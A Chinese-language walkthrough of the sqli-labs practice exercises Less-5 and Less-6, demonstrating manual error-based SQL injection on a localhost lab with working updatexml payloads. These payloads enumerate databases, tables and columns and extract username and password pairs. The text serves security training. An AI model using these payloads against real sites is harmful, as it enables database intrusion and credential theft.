目录
一、错误注入(手工)SQL注入基本步骤:
二、Less5(GET-Double injection-Single Quotes -String)
2.1、简介:(单引号+报错注入)
2.2、第一步:注入点测试
2.3、第二步:查询字段数
2.4、第三步:查看数据库基本信息
2.5、第四步:爆数据库
2.6、第五步:爆数据库表
2.7、第六步:爆字段
2.8、第七步:爆数据
三、Less6(GET-Double injection-Double Quotes -String)
3.1、简介:(双引号+报错注入)
3.2、第一步:注入点测试
3.3、第二步:查询字段数
3.4、第三步:查看数据库基本信息
3.5、第四步:爆数据库
3.6、第五步:爆数据库表
3.7、第六步:爆字段
3.8、第七步:爆数据
一、错误注入(手工)SQL注入基本步骤:
第一步:注入点测试
第二步:查询字段数
第三步:查询数据库的基本信息
第四步:爆数据库名
第五步:爆数据库表
第六步:爆字段
第七步:爆数据
二、Less5(GET-Double injection-Single Quotes -String)
2.1、简介:(单引号+报错注入)
请求方法:GET
方法:错误回显
2.2、第一步:注入点测试
测试id=1,没有显示数据
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1
将数据扩大到1000了,仍没有显示位
所以不能使用联合查询
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1000
加上单引号后,发现会返回报错信息,且可以知道是单引号闭合的
可以考虑使用报错注入
2.3、第二步:查询字段数
输入为2时,报错字段数不符
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and 1=0 union select 1,2--+
当为3的时候,就没有报错,字段数正确
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and 1=0 union select 1,2,3--+
2.4、第三步:查看数据库基本信息
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
2.5、第四步:爆数据库
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
注:
在ASCII码表中,0x7e这个十六进制数代表符号~,~这个符号在xpath语法中是不存在的,因此总能报错
2.6、第五步:爆数据库表
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)--+
2.7、第六步:爆字段
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1) --+
2.8、第七步:爆数据
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)--+
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),31,32),0x7e),1)--+
将31,32继续往后移,就可以获得,更多的数据
三、Less6(GET-Double injection-Double Quotes -String)
3.1、简介:(双引号+报错注入)
请求方法:GET
方法:错误回显
3.2、第一步:注入点测试
测试id=1,没有显示数据
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1
将数据扩大到1000了,仍没有显示位
所以不能使用联合查询
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1000
加上单引号后,没有报错,说明不是单引号闭合
加上双引号后,发现会返回报错信息,且可以知道是双引号闭合的
可以考虑使用报错注入
3.3、第二步:查询字段数
输入为2时,报错字段数不符
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1" and 1=0 union select 1,2--+
当为3的时候,就没有报错,字段数正确
http://localhost:8080/sqli-labs-master/Less-5/ ?id=1' and 1=0 union select 1,2,3--+
3.4、第三步:查看数据库基本信息
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1" and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
3.5、第四步:爆数据库
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
注:
在ASCII码表中,0x7e这个十六进制数代表符号~,~这个符号在xpath语法中是不存在的,因此总能报错
3.6、第五步:爆数据库表
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) --+
3.7、第六步:爆字段
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)--+
3.8、第七步:爆数据
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)--+
http://localhost:8080/sqli-labs-master/Less-6/ ?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),31,32),0x7e),1)--+
将31,32继续往后移,就可以获得,更多的数据
